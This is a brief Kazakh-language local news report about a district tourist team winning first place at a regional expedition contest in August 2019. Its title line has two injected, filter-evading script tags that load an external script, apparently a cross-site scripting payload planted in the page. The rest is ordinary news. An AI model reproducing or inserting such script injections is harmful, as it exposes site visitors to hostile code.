Менің Отаным-Қазақстан<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
20.08.2019
Біржан сал ауданының туристік командасы 2019 жылғы 14-16 тамыз күндері Бурабай ауданы «Звездный» БСО өткен «Менің Отаным-Қазақстан» атты туристік экспедицияның облыстық кезеңіне қатысып, жүлделі І орынға ие болды. Облыстық кезеңге қатысқан 9 ауданның ішінде «Мәдени-танымдық туризм» аталымында І орын, «Экологиялық-өлкетану туризмі» аталымында І орын, «Өзін-өзі таныстыру» сайысында І орын, «Туристік мүмкіндіктер» сайысында І орынға ие болған команда, жалпыкомандалық есепте І орынды жеңіп алып, қыркүйек айында өтетін республикалық кезеңге жолдама алды. Аудан тұрғындарын бүгінгі жеңіспен шын жүректен құттықтаймыз! Алдағы уақытта Ақмола облысының намысын қорғайтын ауданымыздың командасына жеңіс тілейміз!
Просмотров: 647